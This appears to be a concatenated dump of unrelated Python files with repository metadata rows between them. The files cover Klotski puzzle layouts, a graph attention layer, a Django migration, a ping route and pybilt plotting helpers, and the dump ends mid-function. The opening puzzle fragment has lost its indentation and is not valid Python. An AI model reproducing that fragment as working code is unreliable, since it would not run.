zhaoYun = Jiang([1, 3], HOR, 'y')
guanYu = Jiang([0, 0], HOR, 'g')
maChao = Jiang([0, 1], VER, 'm')
huangZhong = Jiang([3, 1], VER, 'h')
zhangFei = Jiang([2, 0], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 3])
b2 = Bing([0, 4])
b3 = Bing([3, 3])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 兵临曹营:
def BLCY():
# caoCao:
caoCao = CaoCao([1, 0])
# Jiangs:
zhaoYun = Jiang([3, 2], VER, 'y')
guanYu = Jiang([1, 2], HOR, 'g')
maChao = Jiang([1, 3], VER, 'm')
huangZhong = Jiang([2, 3], VER, 'h')
zhangFei = Jiang([0, 2], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([0, 1])
b3 = Bing([3, 0])
b4 = Bing([3, 1])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 四将连关:
def SJLG():
# caoCao:
caoCao = CaoCao([0, 0])
# Jiangs:
zhaoYun = Jiang([2, 2], HOR, 'y')
guanYu = Jiang([2, 0], HOR, 'g')
maChao = Jiang([0, 2], VER, 'm')
huangZhong = Jiang([1, 2], VER, 'h')
zhangFei = Jiang([2, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 4])
b2 = Bing([2, 3])
b3 = Bing([3, 3])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 新近在咫尺:
def XJZZC():
# caoCao:
caoCao = CaoCao([0, 3])
# Jiangs:
zhaoYun = Jiang([2, 2], VER, 'y')
guanYu = Jiang([0, 1], HOR, 'g')
maChao = Jiang([3, 0], VER, 'm')
huangZhong = Jiang([2, 0], VER, 'h')
zhangFei = Jiang([3, 2], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 2])
b2 = Bing([1, 2])
b3 = Bing([2, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 星罗棋布:
def XLQB():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([1, 4], HOR, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([3, 1], VER, 'm')
huangZhong = Jiang([0, 1], VER, 'h')
zhangFei = Jiang([1, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([3, 0])
b3 = Bing([0, 3])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 四面八方:
def SMBF():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([1, 4], HOR, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([3, 2], VER, 'm')
huangZhong = Jiang([0, 2], VER, 'h')
zhangFei = Jiang([1, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 1])
b2 = Bing([3, 1])
b3 = Bing([0, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 牛气冲天:
def NQCT():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([1, 4], HOR, 'y')
guanYu = Jiang([0, 1], HOR, 'g')
maChao = Jiang([3, 2], VER, 'm')
huangZhong = Jiang([0, 2], VER, 'h')
zhangFei = Jiang([2, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([3, 0])
b3 = Bing([0, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 调兵谴将:
def DBQJ():
# caoCao:
caoCao = CaoCao([0, 0])
# Jiangs:
zhaoYun = Jiang([0, 3], HOR, 'y')
guanYu = Jiang([0, 2], HOR, 'g')
maChao = Jiang([2, 3], HOR, 'm')
huangZhong = Jiang([1, 4], HOR, 'h')
zhangFei = Jiang([2, 2], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([2, 0])
b2 = Bing([3, 0])
b3 = Bing([2, 1])
b4 = Bing([3, 1])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 背水列阵:
def BSZL():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([2, 4], HOR, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([3, 0], VER, 'm')
huangZhong = Jiang([0, 0], VER, 'h')
zhangFei = Jiang([0, 4], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([1, 1])
b2 = Bing([2, 1])
b3 = Bing([0, 3])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 横刀立马2:
def HDLM2():
# caoCao:
caoCao = CaoCao([1, 0])
# Jiangs:
zhaoYun = Jiang([0, 3], VER, 'y')
guanYu = Jiang([1, 2], HOR, 'g')
maChao = Jiang([3, 0], VER, 'm')
huangZhong = Jiang([0, 0], VER, 'h')
zhangFei = Jiang([3, 3], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 2])
b2 = Bing([1, 3])
b3 = Bing([2, 3])
b4 = Bing([3, 2])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList) | 24.323625 | 60 | 0.566525 | 1,166 | 7,516 | 3.651801 | 0.066038 | 0.090183 | 0.067637 | 0.086426 | 0.900658 | 0.859558 | 0.84946 | 0.842179 | 0.80202 | 0.798967 | 0 | 0.076076 | 0.202501 | 7,516 | 309 | 61 | 24.323625 | 0.634301 | 0.072379 | 0 | 0.728889 | 0 | 0 | 0.011586 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071111 | false | 0 | 0.004444 | 0 | 0.146667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cd7a47e07ba859f58f6b50d74a9658424bb5bd3f | 185 | py | Python | run_rmsd_pruning.py | ks8/conformation | f470849d5b7b90dc5a65bab8a536de1d57c1021a | [
"MIT"
] | null | null | null | run_rmsd_pruning.py | ks8/conformation | f470849d5b7b90dc5a65bab8a536de1d57c1021a | [
"MIT"
] | null | null | null | run_rmsd_pruning.py | ks8/conformation | f470849d5b7b90dc5a65bab8a536de1d57c1021a | [
"MIT"
] | null | null | null | """ RMSD pruning of RDKit conformations. """
from conformation.run_rmsd_pruning import run_rmsd_pruning, Args
if __name__ == '__main__':
run_rmsd_pruning(Args().parse_args())
| 30.833333 | 65 | 0.740541 | 24 | 185 | 5.083333 | 0.583333 | 0.360656 | 0.344262 | 0.295082 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145946 | 185 | 5 | 66 | 37 | 0.772152 | 0.194595 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
26a081d187514418bd883b088cf9e8819bb70d4c | 4,174 | py | Python | GAT/layers.py | phcavelar/graph-odenet | cba1224c041e53ea221e31bf9103ef950b8bd460 | [
"MIT"
] | 4 | 2019-12-10T18:49:03.000Z | 2022-02-16T03:21:30.000Z | GAT/layers.py | phcavelar/graph-odenet | cba1224c041e53ea221e31bf9103ef950b8bd460 | [
"MIT"
] | 1 | 2020-11-04T04:41:09.000Z | 2021-01-07T18:52:37.000Z | GAT/layers.py | phcavelar/graph-odenet | cba1224c041e53ea221e31bf9103ef950b8bd460 | [
"MIT"
] | 2 | 2020-04-03T12:05:33.000Z | 2020-10-10T11:57:48.000Z | import math
import torch
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import torch.nn.functional as F
import torch.nn as nn
class GraphConvolution(Module):
"""
GAT layer
"""
def __init__(self,in_features, out_features, bias=True,act=F.relu,eps=1e-6):
super(GraphConvolution,self).__init__()
self.in_features = in_features
self.out_features = out_features
self.f = nn.Linear(2*in_features,out_features)
self.w = nn.Linear(2*in_features,1)
self.eps = eps
self.act = act
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.f.weight)
nn.init.xavier_uniform_(self.w.weight)
def forward(self,x,src,tgt,Mtgt):
"""
features -> N,i node features
adj -> N,N adjacency matrix
src -> E,i source index for edges
tgt -> E,i target index for edges
Msrc -> N,E adjacency matrix from source nodes to edges
Mtgt -> N,E adjacency matrix from target nodes to edges
"""
hsrc = x[src] # E,i
htgt = x[tgt] # E,i
h = torch.cat([hsrc,htgt],dim=1) # E,2i
y = self.act(self.f(h)) # E,o
# FIXME Manual softmax doesn't as expected numerically
a = self.w(h) # E,1
assert not torch.isnan(a).any()
a_base, _ = torch.max(a,0,keepdim=True)#[0] + self.eps
assert not torch.isnan(a_base).any()
a_norm = a-a_base
assert not torch.isnan(a_norm).any()
a_exp = torch.exp(a_norm)
assert not torch.isnan(a_exp).any()
a_sum = torch.spmm(Mtgt,a_exp) + self.eps # N,E x E,1 = N,1
assert not torch.isnan(a_sum).any()
o = torch.spmm(Mtgt,y * a_exp) / a_sum # N,1
assert not torch.isnan(o).any()
return o
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
class FixedGraphConvolution(Module):
"""
GAT layer
"""
def __init__(self,in_features, out_features, bias=True,act=F.relu,eps=1e-6):
super(FixedGraphConvolution,self).__init__()
self.in_features = in_features
self.out_features = out_features
self.f = nn.Linear(2*in_features,out_features)
self.w = nn.Linear(2*in_features,1)
self.eps = eps
self.act = act
self.reset_parameters()
self.src = torch.Tensor( [[1]] )
self.tgt = torch.Tensor( [[1]] )
self.Mtgt = torch.Tensor( [[1]] )
def reset_parameters(self):
nn.init.xavier_uniform_(self.f.weight)
nn.init.xavier_uniform_(self.w.weight)
def set_adj(self,src,tgt,Mtgt):
self.src = src
self.tgt = tgt
self.Mtgt = Mtgt
def forward(self,x):
"""
features -> N,i node features
adj -> N,N adjacency matrix
src -> E,i source index for edges
tgt -> E,i target index for edges
Msrc -> N,E adjacency matrix from source nodes to edges
Mtgt -> N,E adjacency matrix from target nodes to edges
"""
hsrc = x[self.src] # E,i
htgt = x[self.tgt] # E,i
h = torch.cat([hsrc,htgt],dim=1) # E,2i
y = self.act(self.f(h)) # E,o
# FIXME Manual softmax doesn't as expected numerically
a = self.w(h) # E,1
assert not torch.isnan(a).any()
a_base, _ = torch.max(a,0,keepdim=True)#[0] + self.eps
assert not torch.isnan(a_base).any()
a_norm = a-a_base
assert not torch.isnan(a_norm).any()
a_exp = torch.exp(a_norm)
assert not torch.isnan(a_exp).any()
a_sum = torch.spmm(self.Mtgt,a_exp) + self.eps # N,E x E,1 = N,1
assert not torch.isnan(a_sum).any()
o = torch.spmm(self.Mtgt,y * a_exp) / a_sum # N,1
assert not torch.isnan(o).any()
return o
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
| 32.609375 | 80 | 0.571874 | 612 | 4,174 | 3.732026 | 0.151961 | 0.052539 | 0.073555 | 0.099825 | 0.83275 | 0.823993 | 0.823993 | 0.823993 | 0.823993 | 0.823993 | 0 | 0.009942 | 0.30115 | 4,174 | 127 | 81 | 32.866142 | 0.773055 | 0.17058 | 0 | 0.674699 | 0 | 0 | 0.004258 | 0 | 0 | 0 | 0 | 0.015748 | 0.144578 | 1 | 0.108434 | false | 0 | 0.072289 | 0.024096 | 0.253012 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f837b166989cfe9785712f0531f203bbb2023ec8 | 231 | py | Python | src/edinet/app/eagle/models/__init__.py | ryuichi1208/air-pipeline | eac5cad9f089e41ed5aace2fdaf0aff3696efb09 | [
"Apache-2.0"
] | 5 | 2019-12-01T07:50:04.000Z | 2021-06-01T02:04:22.000Z | airflow_ml/edinet_flow/app/eagle/models/__init__.py | icoxfog417/airflow-ml-exercises | 9fc1072a38be7a014ba2ec1a955d96b87c03e104 | [
"MIT"
] | 13 | 2019-12-04T23:09:46.000Z | 2022-03-01T23:10:31.000Z | airflow_ml/edinet_flow/app/eagle/models/__init__.py | icoxfog417/airflow-ml-exercises | 9fc1072a38be7a014ba2ec1a955d96b87c03e104 | [
"MIT"
] | 2 | 2020-05-22T14:27:49.000Z | 2020-10-09T03:20:50.000Z | from .masters import Company
from .masters import EDINETCompany
from .masters import Document
from .masters import EDINETDocument
from .data import CompanyData
from .features import Feature
from .features import NumberOfExecutives
| 28.875 | 40 | 0.848485 | 28 | 231 | 7 | 0.428571 | 0.22449 | 0.346939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 231 | 7 | 41 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f84375d64eec2f0a266e3d776db9be22ea85a96e | 3,209 | py | Python | indicators/migrations/0056_add_verbose_names_to_indicator_fields.py | mercycorps/TolaWorkflow | 59542132fafd611081adb0e8cfaa04abc5886d7a | [
"Apache-2.0"
] | null | null | null | indicators/migrations/0056_add_verbose_names_to_indicator_fields.py | mercycorps/TolaWorkflow | 59542132fafd611081adb0e8cfaa04abc5886d7a | [
"Apache-2.0"
] | 268 | 2020-03-31T15:46:59.000Z | 2022-03-31T18:01:08.000Z | indicators/migrations/0056_add_verbose_names_to_indicator_fields.py | Falliatcom-sa/falliatcom | 39fb926de072c296ed32d50cccfb8003ca870739 | [
"Apache-2.0"
] | 1 | 2021-01-05T01:58:24.000Z | 2021-01-05T01:58:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2019-04-30 18:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('indicators', '0055_auto_20190425_1030'),
]
operations = [
migrations.AlterField(
model_name='externalservice',
name='feed_url',
field=models.CharField(blank=True, max_length=765, verbose_name='Feed URL'),
),
migrations.AlterField(
model_name='externalservice',
name='url',
field=models.CharField(blank=True, max_length=765, verbose_name='URL'),
),
migrations.AlterField(
model_name='externalservicerecord',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='externalservicerecord',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='historicalresult',
name='create_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='historicalresult',
name='edit_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='historicalresult',
name='evidence_url',
field=models.CharField(blank=True, max_length=255, verbose_name='Evidence URL'),
),
migrations.AlterField(
model_name='historicalresult',
name='record_name',
field=models.CharField(blank=True, max_length=135, verbose_name='Record name'),
),
migrations.AlterField(
model_name='result',
name='create_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='result',
name='edit_date',
field=models.DateTimeField(blank=True, help_text=b' ', null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='result',
name='evidence_url',
field=models.CharField(blank=True, max_length=255, verbose_name='Evidence URL'),
),
migrations.AlterField(
model_name='result',
name='record_name',
field=models.CharField(blank=True, max_length=135, verbose_name='Record name'),
),
migrations.AlterField(
model_name='result',
name='site',
field=models.ManyToManyField(blank=True, help_text=b' ', to='workflow.SiteProfile', verbose_name='Site'),
),
migrations.AlterField(
model_name='tolatable',
name='url',
field=models.CharField(blank=True, max_length=255, verbose_name='URL'),
),
]
| 37.313953 | 117 | 0.593643 | 320 | 3,209 | 5.76875 | 0.209375 | 0.151679 | 0.189599 | 0.219935 | 0.832069 | 0.819068 | 0.718852 | 0.703684 | 0.693933 | 0.689599 | 0 | 0.023488 | 0.283577 | 3,209 | 85 | 118 | 37.752941 | 0.779469 | 0.02119 | 0 | 0.782051 | 1 | 0 | 0.153282 | 0.020714 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025641 | 0 | 0.064103 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f849e70fef8dd493d9718a1c9cc7d5e4721bf535 | 111 | py | Python | appfly/app/routes/ping.py | expresso/appfly | 98c6e8a142752847591e6672bb3dc2e5f1fc2ac2 | [
"MIT"
] | null | null | null | appfly/app/routes/ping.py | expresso/appfly | 98c6e8a142752847591e6672bb3dc2e5f1fc2ac2 | [
"MIT"
] | null | null | null | appfly/app/routes/ping.py | expresso/appfly | 98c6e8a142752847591e6672bb3dc2e5f1fc2ac2 | [
"MIT"
] | null | null | null | from appfly.app import response
# from appfly import response
def route():
return response.factory("pong!") | 27.75 | 36 | 0.756757 | 15 | 111 | 5.6 | 0.666667 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144144 | 111 | 4 | 36 | 27.75 | 0.884211 | 0.243243 | 0 | 0 | 0 | 0 | 0.060241 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
6efadf53d38108851fe28f240f411a68010d3253 | 65,805 | py | Python | pybilt/plot_generation/plot_generation_functions.py | blakeaw/ORBILT | ed402dd496534dccd00f3e75b57007d944c58c1d | [
"MIT"
] | 11 | 2019-07-29T16:21:53.000Z | 2022-02-02T11:44:57.000Z | pybilt/plot_generation/plot_generation_functions.py | blakeaw/ORBILT | ed402dd496534dccd00f3e75b57007d944c58c1d | [
"MIT"
] | 11 | 2019-05-15T09:30:05.000Z | 2021-07-19T16:49:59.000Z | pybilt/plot_generation/plot_generation_functions.py | blakeaw/ORBILT | ed402dd496534dccd00f3e75b57007d944c58c1d | [
"MIT"
] | 9 | 2019-08-12T11:14:45.000Z | 2020-12-22T18:22:55.000Z | '''
A set of functions to generate plots/figures from the lipid bilayer analysis outputs.
These functions use matplotlib (http://matplotlib.org/index.html) along with Seaborn (
https://stanford.edu/~mwaskom/software/seaborn/index.html).
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import matplotlib as mpl
from six.moves import range
#check for display and swith mpl backend to Agg is there is none
# solution based on answer by eitanrich
# https://stackoverflow.com/questions/8257385/automatic-detection-of-display-availability-with-matplotlib
if os.name == 'posix' and "DISPLAY" not in os.environ:
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import sys
import itertools
# the default savefig params can be different from the display params
# e.g., you may want a higher resolution, or to make the figure
# background white
sfig_params = {
'savefig.dpi' : 750,
'savefig.format' : 'eps'
}
mpl.rcParams.update(sfig_params)
params = {'figure.figsize': [8.75, 7.25], 'font.size': 22, 'axes.labelsize': 32,
#params = {'figure.figsize': [14.75, 7.25], 'font.size': 22, 'axes.labelsize': 32,
'legend.fontsize': 26,
'xtick.labelsize': 28,
'ytick.labelsize': 28,
'lines.linewidth': 4.0,
'lines.markersize': 20,
'mathtext.fontset' : 'cm'}
mpl.rcParams.update(params)
#sns.set_style("whitegrid")
#sns.set_style("white")
#sns.set(context="paper", font="monospace")
sns.set_style("ticks")
_color_list = ['blue', 'green','orange','purple', 'black', 'red', 'yellow', 'gray']
def update_rcparams(rcparams):
mpl.rcParams.update(rcparams)
return
def plot(dat_list,yerr_list=None, xerr_list=None, name_list=None,filename='plot.eps', save=True, show=False, xlabel=None, ylabel=None,
marker=None, linestyle=None, xticks=None):
"""Generic plotting function for (multiple) xy datasets.
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
ls = linestyle
if linestyle is None:
ls = '-'
i = 0
for dat in dat_list:
if i > 6 and (linestyle is None):
ls = '--'
if (yerr_list is None and xerr_list is None):
if name_list is not None:
if marker is None:
plt.plot(dat[0], dat[1],label=name_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.plot(dat[0], dat[1],label=name_list[i], marker=marker,
linestyle=ls, color=next(_colors))
else:
if marker is None:
plt.plot(dat[0], dat[1], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.plot(dat[0], dat[1], marker=marker, linestyle=ls,
color=next(_colors))
elif (yerr_list is not None) and (xerr_list is None):
if name_list is not None:
if marker is None:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
label=name_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
label=name_list[i], marker=marker,
linestyle=ls, color=next(_colors))
else:
if marker is None:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
linestyle=ls, marker=next(_marker),
color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], yerr=yerr_list[i],
marker=marker, linestyle=ls,
color=next(_colors))
elif (yerr_list is None) and (xerr_list is not None):
if name_list is not None:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
label=name_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
label=name_list[i], marker=marker,
linestyle=ls, color=next(_colors))
else:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
linestyle=ls, marker=next(_marker),
color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
marker=marker, linestyle=ls,
color=next(_colors))
else:
if name_list is not None:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i], label=name_list[i],
linestyle=ls, marker=next(_marker),
color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i],label=name_list[i],
marker=marker, linestyle=ls,
color=next(_colors))
else:
if marker is None:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i], linestyle=ls,
marker=next(_marker), color=next(_colors))
else:
plt.errorbar(dat[0], dat[1], xerr=xerr_list[i],
yerr=yerr_list[i], marker=marker,
linestyle=ls, color=next(_colors))
i+=1
if xticks is not None:
plt.xticks(xticks)
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
if xticks is not None:
plt.xticks(xticks)
lgd = None
if name_list is not None:
#lgd = plt.legend(loc=7)
if len(name_list) > 3:
lgd = plt.legend(loc="center left", bbox_to_anchor=(1.04, 0.5))
else:
lgd = plt.legend(loc=0)
plt.tight_layout()
if save:
if lgd is not None:
plt.savefig(filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
else:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def gen_step_vector_ghost_tails(vectors_resnames, length=5, periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
tails = []
for i in range(n_traj):
back_index = i - length
while back_index < 0:
back_index += 1
tails.append([])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1):
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
#dist = np.sqrt(dx**2 + dy**2)
#print(dx, dy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
#print(xx)
xk = np.array(xx)
yk = np.array(yy)
tails[i].append((xk, yk))
return tails
def gen_step_vector_net_ghost_tails(vectors_resnames, length=6, group_size=2,
periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
tails = []
for i in range(n_traj):
back_index = i - length
while back_index < 0:
back_index += 1
tails.append([])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1, group_size):
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
if (i+1 - back_index) % group_size != 0:
vec_c = vectors_resnames[i][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
# print(xx)
xk = np.array(xx)
yk = np.array(yy)
tails[i].append((xk, yk))
return tails
def gen_step_vector_smooth_ghost_tails(vectors_resnames, length=9, window=3, periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
print(n_vecs, n_traj)
smooth_delta = (window -1)/2
tails = []
for i in range(n_traj):
back_index = i - length
while back_index < 0:
back_index += 1
tails.append([])
#n_vecs = len(vectors_resnames[])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1):
#print(j, i, k, vectors_resnames[k][1][j], vectors_resnames[i][1][j])
print(len(vectors_resnames[k][1]), len(vectors_resnames[i][1]))
# if vectors_resnames[k][1][j] != vectors_resnames[i][1][j]:
# quit()
# elif len(vectors_resnames[k][1]) != 300:
# quit()
# elif len(vectors_resnames[i][1]) != 300:
# quit()
#print(j, len(vectors_resnames[k][0]))
#if j >= len(vectors_resnames[k][0]):
# quit()
# j = len(vectors_resnames[k][0])-1
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
#dist = np.sqrt(dx**2 + dy**2)
#print(dx, dy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
n_pp = len(xx)
xxx = []
yyy = []
for k in range(n_pp):
b_i = k - smooth_delta
if b_i < 0:
b_i = 0
f_i = k + smooth_delta
if f_i >= n_pp:
f_i = n_pp-1
#print "k ",k," b_i ",b_i," f_i ",f_i," n_pp ",n_pp
x_s = 0.0
y_s = 0.0
a_s = 0
for l in range(b_i, f_i+1):
#print "k ",k," l ",l
x_s += xx[l]
y_s += yy[l]
a_s += 1
x_s /= a_s
y_s /= a_s
if a_s == window:
xxx.append(x_s)
yyy.append(y_s)
xxx.append(x[n_p-1])
yyy.append(y[n_p-1])
#print(xx)
xk = np.array(xxx)
yk = np.array(yyy)
